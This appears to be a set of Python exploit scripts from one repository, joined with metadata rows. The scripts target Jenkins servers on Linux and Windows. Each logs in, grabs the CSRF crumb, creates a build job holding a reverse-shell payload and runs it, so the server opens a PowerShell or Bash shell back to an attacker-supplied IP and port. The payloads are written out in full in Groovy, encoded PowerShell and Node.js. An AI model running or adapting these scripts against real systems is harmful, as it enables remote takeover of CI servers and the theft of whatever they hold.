crumb = soup.find_all('script')[19].text
jenkins_crumb = re.search("[a-f0-9]{32}",crumb).group()
#Create a random build name to avoid duplicates
build_name = "build_" + ''.join(random.choice('0123456789') for i in range(6))
#New job information and type
build_data = {
"name": build_name,
"mode": "org.jenkinsci.plugins.workflow.job.WorkflowJob",
"Jenkins-Crumb": jenkins_crumb}
#Creating a new job
q = requests.post(WEBSITE + "/view/all/createItem", data=build_data, cookies=cookies2, proxies=PROXIES)
#Checking if user is able to create new jobs
if q.status_code == 200:
print("[>] Creating a new job to spawn our reverse shell", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not create a new job, user does not have the necessary rights. Check it manually.")
#Groovy's Powershell reverse shell
#https://www.revshells.com/Groovy?ip=<IP>&port=<PORT>&shell=powershell
reverse_shell = 'node {\n\
String host = "' + str(LOCAL_IP) + '";\n\
int port = ' + str(LOCAL_PORT) + ';\n\
String cmd = "powershell";\n\
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();\n\
Socket s = new Socket(host, port);\n\
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\n\
OutputStream po = p.getOutputStream(), so = s.getOutputStream();\n\
while (!s.isClosed()) {\n\
while (pi.available() > 0)so.write(pi.read());\n\
while (pe.available() > 0)so.write(pe.read());\n\
while (si.available() > 0)po.write(si.read());\n\
so.flush();\n\
po.flush();\n\
Thread.sleep(50);\n\
try {\n\
p.exitValue(); break;\n\
} catch (Exception e) {\n\
}\n\
};\n\
}'
#Configuration of the new job to execute payload
json_config = {
"definition": {
"script": reverse_shell,
"stapler-class": "org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition",
"$class": "org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition"
},
"Jenkins-Crumb": jenkins_crumb
}
#Encoding configuration data into json format
job_data = {
"Jenkins-Crumb": jenkins_crumb,
"Submit": "Save",
"json": json.dumps(json_config)
}
#Saving job configuration with reverse shell payload
p = requests.post(WEBSITE + "/job/" + build_name + "/configSubmit", data=job_data, cookies=cookies2, proxies=PROXIES)
#Checking if the job configuration is correct
if p.status_code == 200:
print("[>] Configuring job " + build_name + " with the reverse shell payload", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not configure the new job, user does not have the necessary rights. Check it manually.")
#Necessary cookies to start the job
params = {"delay": "0sec"}
crum_head = {"Jenkins-Crumb": jenkins_crumb}
#Initializing the job to execute the reverse shell
o = requests.post(WEBSITE + "/job/" + build_name + "/build", params=params, headers=crum_head, cookies=cookies2, proxies=PROXIES)
if o.status_code == 201:
print("[>] Executing the job with the reverse shell, check your listener", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not execute the new job, user does not have the necessary rights. Check it manually.")
#Finalizing script
print ("[+] Exploit executed successfully, should receive a Powershell reverse shell. Enjoy :D")
if __name__ == "__main__":
main()
| 7,956 | Python | .py | 155 | 47.767742 | 181 | 0.691603 | stevenvegar/Jenkins_scripts | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,569 | linux_revshell_groovy.py | stevenvegar_Jenkins_scripts/linux_revshell_groovy.py/linux_revshell_groovy.py | from bs4 import BeautifulSoup
import argparse
import json
import random
import re
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description='Bash reverse shell from Jenkins on a Linux-based server using Groovy script')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-r','--reverse', type=str, required=True, help='Required. IP to receive reverse shell')
parser.add_argument('-rp','--revport', type=str, required=True, help='Required. Port to receive reverse shell')
parser.add_argument('-u','--username', type=str, help='Jenkins username (default: anonymous)')
parser.add_argument('-p','--password', type=str, help='Jenkins password (default: '')')
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
def main():
args = parse_args()
WEB_URL = args.website if 'http' in args.website else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
LOCAL_IP = args.reverse
LOCAL_PORT = args.revport
USERNAME = args.username if args.username else "anonymous"
PASSWORD = args.password if args.password else ""
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
#Get the first JSESSIONID to perform login authentication
t = requests.get(WEBSITE + "/script", proxies=PROXIES)
#Checking connection to Jenkins server
if t.status_code == 403:
print("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
#Baking first cookies
set_cookies1 = re.search("^(.*?);", (t.headers['Set-Cookie'])).group()
jsession1 = re.search("JSESSIONID.........",set_cookies1).group()
node_cookie1 = re.search("node(.*?);",set_cookies1).group()
cookies1 = {jsession1: node_cookie1}
#JSESSIONID.de9599e1=node03166kmkfqft11st4rulza2916212.node0;
#Server information based on response headers
print ("[+] Server version: " + t.headers['Server'])
print ("[+] Jenkins version: " + t.headers['X-Jenkins'])
print ("[+] Hudson version: " + t.headers['X-Hudson'])
#Post data to send in order to login
login_data = {
"j_username": USERNAME,
"j_password": PASSWORD,
"Submit": "Sign in"}
#Send authentication request
s = requests.post(WEBSITE + "/j_acegi_security_check", cookies=cookies1, data=login_data, allow_redirects=False, proxies=PROXIES)
#Checking connection to login portal
if s.status_code == 302:
print("[>] Authentication in progress as " + USERNAME, end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins login portal. Check URL and port.")
exit()
#Baking second cookies and checking if credentials work
set_cookies2 = re.search("^(.*?);", (s.headers['Set-Cookie'])).group()
jsession2 = re.search("JSESSIONID.........",set_cookies2)
if jsession2:
jsession2 = jsession2.group()
node_cookie2 = re.search("node(.*?);",set_cookies2).group()
print ("[+] Valid credentials!!! Authentication successful!!!")
else:
print("[-] Error: Can not perform authentication, check credentials or permissions...")
exit()
cookies2 = {jsession2: node_cookie2}
#JSESSIONID.de9599e1=node0168z3renghcpo1hhfd1dq9zy47241.node0;
#Listing all current jobs
r = requests.get(WEBSITE + "/view/all/newJob", cookies=cookies2, proxies=PROXIES)
#Checking if user is able to view current jobs
if r.status_code == 200:
print("[>] Listing existing jobs and getting Jenkins-Crumb token", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not list current jobs, user does not have the necessary privileges. Check it manually.")
#Grabbing Jenkins-Crumb from response body
soup = BeautifulSoup(r.content, "html.parser")
crumb = soup.find_all('script')[19].text
jenkins_crumb = re.search("[a-f0-9]{32}",crumb).group()
#Create a random build name to avoid duplicates
build_name = "build_" + ''.join(random.choice('0123456789') for i in range(6))
#New job information and type
build_data = {
"name": build_name,
"mode": "org.jenkinsci.plugins.workflow.job.WorkflowJob",
"Jenkins-Crumb": jenkins_crumb}
#Creating a new job
q = requests.post(WEBSITE + "/view/all/createItem", data=build_data, cookies=cookies2, proxies=PROXIES)
#Checking if user is able to create new jobs
if q.status_code == 200:
print("[>] Creating a new job to spawn our reverse shell", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not create a new job, user does not have the necessary rights. Check it manually.")
#Groovy's Bash reverse shell
#https://www.revshells.com/Groovy?ip=<IP>&port=<PORT>&shell=/bin/bash
reverse_shell = 'node {\n\
String host = "' + str(LOCAL_IP) + '";\n\
int port = ' + str(LOCAL_PORT) + ';\n\
String cmd = "/bin/bash";\n\
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();\n\
Socket s = new Socket(host, port);\n\
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\n\
OutputStream po = p.getOutputStream(), so = s.getOutputStream();\n\
while (!s.isClosed()) {\n\
while (pi.available() > 0)so.write(pi.read());\n\
while (pe.available() > 0)so.write(pe.read());\n\
while (si.available() > 0)po.write(si.read());\n\
so.flush();\n\
po.flush();\n\
Thread.sleep(50);\n\
try {\n\
p.exitValue(); break;\n\
} catch (Exception e) {\n\
}\n\
};\n\
}'
#Configuration of the new job to execute payload
json_config = {
"definition": {
"script": reverse_shell,
"stapler-class": "org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition",
"$class": "org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition"
},
"Jenkins-Crumb": jenkins_crumb
}
#Encoding configuration data into json format
job_data = {
"Jenkins-Crumb": jenkins_crumb,
"Submit": "Save",
"json": json.dumps(json_config)
}
#Saving job configuration with reverse shell payload
p = requests.post(WEBSITE + "/job/" + build_name + "/configSubmit", data=job_data, cookies=cookies2, proxies=PROXIES)
#Checking if the job configuration is correct
if p.status_code == 200:
print("[>] Configuring job " + build_name + " with the reverse shell payload", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not configure the new job, user does not have the necessary rights. Check it manually.")
#Necessary cookies to start the job
params = {"delay": "0sec"}
crum_head = {"Jenkins-Crumb": jenkins_crumb}
#Initializing the job to execute the reverse shell
o = requests.post(WEBSITE + "/job/" + build_name + "/build", params=params, headers=crum_head, cookies=cookies2, proxies=PROXIES)
if o.status_code == 201:
print("[>] Executing the job with the reverse shell, check your listener", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not execute the new job, user does not have the necessary rights. Check it manually.")
#Finalizing script
print ("[+] Exploit executed successfully, should receive a Bash reverse shell. Enjoy :D")
if __name__ == "__main__":
main()
| 7,934 | Python | .py | 155 | 47.625806 | 181 | 0.690208 | stevenvegar/Jenkins_scripts | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,570 | win_revshell_cmd.py | stevenvegar_Jenkins_scripts/win_revshell_cmd.py/win_revshell_cmd.py | from bs4 import BeautifulSoup
import argparse
import base64
import json
import random
import re
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description='Powershell reverse shell from Jenkins on a Windows-based server using batch command')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-r','--reverse', type=str, required=True, help='Required. IP to receive reverse shell')
parser.add_argument('-rp','--revport', type=str, required=True, help='Required. Port to receive reverse shell')
parser.add_argument('-u','--username', type=str, help='Jenkins username (default: anonymous)')
parser.add_argument('-p','--password', type=str, help='Jenkins password (default: '')')
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
def main():
args = parse_args()
WEB_URL = args.website if 'http' in args.website else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
LOCAL_IP = args.reverse
LOCAL_PORT = args.revport
USERNAME = args.username if args.username else "anonymous"
PASSWORD = args.password if args.password else ""
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
#Get the first JSESSIONID to perform login authentication
t = requests.get(WEBSITE + "/script", proxies=PROXIES)
#Checking connection to Jenkins server
if t.status_code == 403:
print("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
#Baking first cookies
set_cookies1 = re.search("^(.*?);", (t.headers['Set-Cookie'])).group()
jsession1 = re.search("JSESSIONID.........",set_cookies1).group()
node_cookie1 = re.search("node(.*?);",set_cookies1).group()
cookies1 = {jsession1: node_cookie1}
#JSESSIONID.de9599e1=node03166kmkfqft11st4rulza2916212.node0;
#Server information based on response headers
print ("[+] Server version: " + t.headers['Server'])
print ("[+] Jenkins version: " + t.headers['X-Jenkins'])
print ("[+] Hudson version: " + t.headers['X-Hudson'])
#Post data to send in order to login
login_data = {
"j_username": USERNAME,
"j_password": PASSWORD,
"Submit": "Sign in"}
#Send authentication request
s = requests.post(WEBSITE + "/j_acegi_security_check", cookies=cookies1, data=login_data, allow_redirects=False, proxies=PROXIES)
#Checking connection to login portal
if s.status_code == 302:
print("[>] Authentication in progress as " + USERNAME, end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins login portal. Check URL and port.")
exit()
#Baking second cookies and checking if credentials work
set_cookies2 = re.search("^(.*?);", (s.headers['Set-Cookie'])).group()
jsession2 = re.search("JSESSIONID.........",set_cookies2)
if jsession2:
jsession2 = jsession2.group()
node_cookie2 = re.search("node(.*?);",set_cookies2).group()
print ("[+] Valid credentials!!! Authentication successful!!!")
else:
print("[-] Error: Can not perform authentication, check credentials or permissions...")
exit()
cookies2 = {jsession2: node_cookie2}
#JSESSIONID.de9599e1=node0168z3renghcpo1hhfd1dq9zy47241.node0;
#Listing all current jobs
r = requests.get(WEBSITE + "/view/all/newJob", cookies=cookies2, proxies=PROXIES)
#Checking if user is able to view current jobs
if r.status_code == 200:
print("[>] Listing existing jobs and getting Jenkins-Crumb token", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not list current jobs, user does not have the necessary privileges. Check it manually.")
#Grabbing Jenkins-Crumb from response body
soup = BeautifulSoup(r.content, "html.parser")
crumb = soup.find_all('script')[19].text
jenkins_crumb = re.search("[a-f0-9]{32}",crumb).group()
#Create a random build name to avoid duplicates
build_name = "build_" + ''.join(random.choice('0123456789') for i in range(6))
#New job information and type
build_data = {
"name": build_name,
"mode": "hudson.model.FreeStyleProject",
"Jenkins-Crumb": jenkins_crumb}
#Creating a new job
q = requests.post(WEBSITE + "/view/all/createItem", data=build_data, cookies=cookies2, proxies=PROXIES)
#Checking if user is able to create new jobs
if q.status_code == 200:
print("[>] Creating a new job to spawn our reverse shell", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not create a new job, user does not have the necessary rights. Check it manually.")
#Encode Powershell reverse shell to base64
#https://www.revshells.com/PowerShell%20%232?ip=<IP>&port=<PORT>&shell=powershell
dec_payload = '$client = New-Object System.Net.Sockets.TCPClient("' + LOCAL_IP + '",' + str(LOCAL_PORT) + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
encode = str(base64.b64encode(bytes(dec_payload, "utf-16-le")), encoding='ascii')
reverse_shell = "powershell -e " + encode
#Configuration of the new job to execute payload
json_config = {
"builder": {
"command": reverse_shell,
"stapler-class": "hudson.tasks.BatchFile",
"$class": "hudson.tasks.BatchFile"
},
"Jenkins-Crumb": jenkins_crumb
}
#Encoding configuration data into json format
job_data = {
"Jenkins-Crumb": jenkins_crumb,
"Submit": "Save",
"json": json.dumps(json_config)
}
#Saving job configuration with reverse shell payload
p = requests.post(WEBSITE + "/job/" + build_name + "/configSubmit", data=job_data, cookies=cookies2, proxies=PROXIES)
#Checking if the job configuration is correct
if p.status_code == 200:
print("[>] Configuring job " + build_name + " with the reverse shell payload", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not configure the new job, user does not have the necessary rights. Check it manually.")
#Necessary cookies to start the job
params = {"delay": "0sec"}
crum_head = {"Jenkins-Crumb": jenkins_crumb}
#Initializing the job to execute the reverse shell
o = requests.post(WEBSITE + "/job/" + build_name + "/build", params=params, headers=crum_head, cookies=cookies2, proxies=PROXIES)
if o.status_code == 201:
print("[>] Executing the job with the reverse shell, check your listener", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not execute the new job, user does not have the necessary rights. Check it manually.")
#Finalizing script
print ("[+] Exploit executed successfully, should receive a Powershell reverse shell. Enjoy :D")
if __name__ == "__main__":
main()
| 7,812 | Python | .py | 138 | 53.094203 | 542 | 0.696382 | stevenvegar/Jenkins_scripts | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,571 | win_revshell_nodejs.py | stevenvegar_Jenkins_scripts/win_revshell_nodejs.py/win_revshell_nodejs.py | from bs4 import BeautifulSoup
import argparse
import json
import random
import re
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description='Powershell reverse shell from Jenkins on a Windows-based server using NodeJS script')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-r','--reverse', type=str, required=True, help='Required. IP to receive reverse shell')
parser.add_argument('-rp','--revport', type=str, required=True, help='Required. Port to receive reverse shell')
parser.add_argument('-u','--username', type=str, help='Jenkins username (default: anonymous)')
parser.add_argument('-p','--password', type=str, help='Jenkins password (default: '')')
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
def main():
args = parse_args()
WEB_URL = args.website if 'http' in args.website else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
LOCAL_IP = args.reverse
LOCAL_PORT = args.revport
USERNAME = args.username if args.username else "anonymous"
PASSWORD = args.password if args.password else ""
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
#Get the first JSESSIONID to perform login authentication
t = requests.get(WEBSITE + "/script", proxies=PROXIES)
#Checking connection to Jenkins server
if t.status_code == 403:
print("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
#Baking first cookies
set_cookies1 = re.search("^(.*?);", (t.headers['Set-Cookie'])).group()
jsession1 = re.search("JSESSIONID.........",set_cookies1).group()
node_cookie1 = re.search("node(.*?);",set_cookies1).group()
cookies1 = {jsession1: node_cookie1}
#JSESSIONID.de9599e1=node03166kmkfqft11st4rulza2916212.node0;
#Server information based on response headers
print ("[+] Server version: " + t.headers['Server'])
print ("[+] Jenkins version: " + t.headers['X-Jenkins'])
print ("[+] Hudson version: " + t.headers['X-Hudson'])
#Post data to send in order to login
login_data = {
"j_username": USERNAME,
"j_password": PASSWORD,
"Submit": "Sign in"}
#Send authentication request
s = requests.post(WEBSITE + "/j_acegi_security_check", cookies=cookies1, data=login_data, allow_redirects=False, proxies=PROXIES)
#Checking connection to login portal
if s.status_code == 302:
print("[>] Authentication in progress as " + USERNAME, end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins login portal. Check URL and port.")
exit()
#Baking second cookies and checking if credentials work
set_cookies2 = re.search("^(.*?);", (s.headers['Set-Cookie'])).group()
jsession2 = re.search("JSESSIONID.........",set_cookies2)
if jsession2:
jsession2 = jsession2.group()
node_cookie2 = re.search("node(.*?);",set_cookies2).group()
print ("[+] Valid credentials!!! Authentication successful!!!")
else:
print("[-] Error: Can not perform authentication, check credentials or permissions...")
exit()
cookies2 = {jsession2: node_cookie2}
#JSESSIONID.de9599e1=node0168z3renghcpo1hhfd1dq9zy47241.node0;
#Listing all current jobs
r = requests.get(WEBSITE + "/view/all/newJob", cookies=cookies2, proxies=PROXIES)
#Checking if user is able to view current jobs
if r.status_code == 200:
print("[>] Listing existing jobs and getting Jenkins-Crumb token", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not list current jobs, user does not have the necessary privileges. Check it manually.")
#Grabbing Jenkins-Crumb from response body
soup = BeautifulSoup(r.content, "html.parser")
crumb = soup.find_all('script')[19].text
jenkins_crumb = re.search("[a-f0-9]{32}",crumb).group()
#Create a random build name to avoid duplicates
build_name = "build_" + ''.join(random.choice('0123456789') for i in range(6))
#New job information and type
build_data = {
"name": build_name,
"mode": "hudson.model.FreeStyleProject",
"Jenkins-Crumb": jenkins_crumb}
#Creating a new job
q = requests.post(WEBSITE + "/view/all/createItem", data=build_data, cookies=cookies2, proxies=PROXIES)
#Checking if user is able to create new jobs
if q.status_code == 200:
print("[>] Creating a new job to spawn our reverse shell", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not create a new job, user does not have the necessary rights. Check it manually.")
#Node.js's Powershell reverse shell
#https://www.revshells.com/node.js%20%232?ip=<IP>&port=<PORT>&shell=powershell
reverse_shell = '(function(){\n\
var net = require("net"),\n\
cp = require("child_process"),\n\
sh = cp.spawn("powershell", []);\n\
var client = new net.Socket();\n\
client.connect(' + str(LOCAL_PORT) + ', "' + str(LOCAL_IP) + '", function(){\n\
client.pipe(sh.stdin);\n\
sh.stdout.pipe(client);\n\
sh.stderr.pipe(client);\n\
});\n\
return /a/;\n\
})();'
#Configuration of the new job to execute payload
json_config = {
"builder": {
"command": reverse_shell,
"stapler-class": "jenkins.plugins.nodejs.NodeJSCommandInterpreter",
"$class": "jenkins.plugins.nodejs.NodeJSCommandInterpreter"
},
"Jenkins-Crumb": jenkins_crumb
}
#Encoding configuration data into json format
job_data = {
"Jenkins-Crumb": jenkins_crumb,
"Submit": "Save",
"json": json.dumps(json_config)
}
#Saving job configuration with reverse shell payload
p = requests.post(WEBSITE + "/job/" + build_name + "/configSubmit", data=job_data, cookies=cookies2, proxies=PROXIES)
#Checking if the job configuration is correct
if p.status_code == 200:
print("[>] Configuring job " + build_name + " with the reverse shell payload", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not configure the new job, user does not have the necessary rights. Check it manually.")
#Necessary cookies to start the job
params = {"delay": "0sec"}
crum_head = {"Jenkins-Crumb": jenkins_crumb}
#Initializing the job to execute the reverse shell
o = requests.post(WEBSITE + "/job/" + build_name + "/build", params=params, headers=crum_head, cookies=cookies2, proxies=PROXIES)
if o.status_code == 201:
print("[>] Executing the job with the reverse shell, check your listener", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not execute the new job, user does not have the necessary rights. Check it manually.")
#Finalizing script
print ("[+] Exploit executed successfully, should receive a Powershell reverse shell. Enjoy :D")
if __name__ == "__main__":
main()
| 7,596 | Python | .py | 146 | 48.184932 | 181 | 0.690084 | stevenvegar/Jenkins_scripts | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,572 | linux_revshell_nodejs.py | stevenvegar_Jenkins_scripts/linux_revshell_nodejs.py/linux_revshell_nodejs.py | from bs4 import BeautifulSoup
import argparse
import json
import random
import re
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description='Bash reverse shell from Jenkins on a Linux-based server using NodeJS script')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-r','--reverse', type=str, required=True, help='Required. IP to receive reverse shell')
parser.add_argument('-rp','--revport', type=str, required=True, help='Required. Port to receive reverse shell')
parser.add_argument('-u','--username', type=str, help='Jenkins username (default: anonymous)')
parser.add_argument('-p','--password', type=str, help='Jenkins password (default: '')')
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
def main():
args = parse_args()
WEB_URL = args.website if 'http' in args.website else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
LOCAL_IP = args.reverse
LOCAL_PORT = args.revport
USERNAME = args.username if args.username else "anonymous"
PASSWORD = args.password if args.password else ""
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
#Get the first JSESSIONID to perform login authentication
t = requests.get(WEBSITE + "/script", proxies=PROXIES)
#Checking connection to Jenkins server
if t.status_code == 403:
print("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
#Baking first cookies
set_cookies1 = re.search("^(.*?);", (t.headers['Set-Cookie'])).group()
jsession1 = re.search("JSESSIONID.........",set_cookies1).group()
node_cookie1 = re.search("node(.*?);",set_cookies1).group()
cookies1 = {jsession1: node_cookie1}
#JSESSIONID.de9599e1=node03166kmkfqft11st4rulza2916212.node0;
#Server information based on response headers
print ("[+] Server version: " + t.headers['Server'])
print ("[+] Jenkins version: " + t.headers['X-Jenkins'])
print ("[+] Hudson version: " + t.headers['X-Hudson'])
#Post data to send in order to login
login_data = {
"j_username": USERNAME,
"j_password": PASSWORD,
"Submit": "Sign in"}
#Send authentication request
s = requests.post(WEBSITE + "/j_acegi_security_check", cookies=cookies1, data=login_data, allow_redirects=False, proxies=PROXIES)
#Checking connection to login portal
if s.status_code == 302:
print("[>] Authentication in progress as " + USERNAME, end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins login portal. Check URL and port.")
exit()
#Baking second cookies and checking if credentials work
set_cookies2 = re.search("^(.*?);", (s.headers['Set-Cookie'])).group()
jsession2 = re.search("JSESSIONID.........",set_cookies2)
if jsession2:
jsession2 = jsession2.group()
node_cookie2 = re.search("node(.*?);",set_cookies2).group()
print ("[+] Valid credentials!!! Authentication successful!!!")
else:
print("[-] Error: Can not perform authentication, check credentials or permissions...")
exit()
cookies2 = {jsession2: node_cookie2}
#JSESSIONID.de9599e1=node0168z3renghcpo1hhfd1dq9zy47241.node0;
#Listing all current jobs
r = requests.get(WEBSITE + "/view/all/newJob", cookies=cookies2, proxies=PROXIES)
#Checking if user is able to view current jobs
if r.status_code == 200:
print("[>] Listing existing jobs and getting Jenkins-Crumb token", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not list current jobs, user does not have the necessary privileges. Check it manually.")
#Grabbing Jenkins-Crumb from response body
soup = BeautifulSoup(r.content, "html.parser")
crumb = soup.find_all('script')[19].text
jenkins_crumb = re.search("[a-f0-9]{32}",crumb).group()
#Create a random build name to avoid duplicates
build_name = "build_" + ''.join(random.choice('0123456789') for i in range(6))
#New job information and type
build_data = {
"name": build_name,
"mode": "hudson.model.FreeStyleProject",
"Jenkins-Crumb": jenkins_crumb}
#Creating a new job
q = requests.post(WEBSITE + "/view/all/createItem", data=build_data, cookies=cookies2, proxies=PROXIES)
#Checking if user is able to create new jobs
if q.status_code == 200:
print("[>] Creating a new job to spawn our reverse shell", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not create a new job, user does not have the necessary rights. Check it manually.")
#Node.js's Bash reverse shell
#https://www.revshells.com/node.js%20%232?ip=<IP>&port=<PORT>&shell=/bin/bash
reverse_shell = '(function(){\n\
var net = require("net"),\n\
cp = require("child_process"),\n\
sh = cp.spawn("/bin/bash", []);\n\
var client = new net.Socket();\n\
client.connect(' + str(LOCAL_PORT) + ', "' + str(LOCAL_IP) + '", function(){\n\
client.pipe(sh.stdin);\n\
sh.stdout.pipe(client);\n\
sh.stderr.pipe(client);\n\
});\n\
return /a/;\n\
})();'
#Configuration of the new job to execute payload
json_config = {
"builder": {
"command": reverse_shell,
"stapler-class": "jenkins.plugins.nodejs.NodeJSCommandInterpreter",
"$class": "jenkins.plugins.nodejs.NodeJSCommandInterpreter"
},
"Jenkins-Crumb": jenkins_crumb
}
#Encoding configuration data into json format
job_data = {
"Jenkins-Crumb": jenkins_crumb,
"Submit": "Save",
"json": json.dumps(json_config)
}
#Saving job configuration with reverse shell payload
p = requests.post(WEBSITE + "/job/" + build_name + "/configSubmit", data=job_data, cookies=cookies2, proxies=PROXIES)
#Checking if the job configuration is correct
if p.status_code == 200:
print("[>] Configuring job " + build_name + " with the reverse shell payload", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not configure the new job, user does not have the necessary rights. Check it manually.")
#Necessary cookies to start the job
params = {"delay": "0sec"}
crum_head = {"Jenkins-Crumb": jenkins_crumb}
#Initializing the job to execute the reverse shell
o = requests.post(WEBSITE + "/job/" + build_name + "/build", params=params, headers=crum_head, cookies=cookies2, proxies=PROXIES)
if o.status_code == 201:
print("[>] Executing the job with the reverse shell, check your listener", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not execute the new job, user does not have the necessary rights. Check it manually.")
#Finalizing script
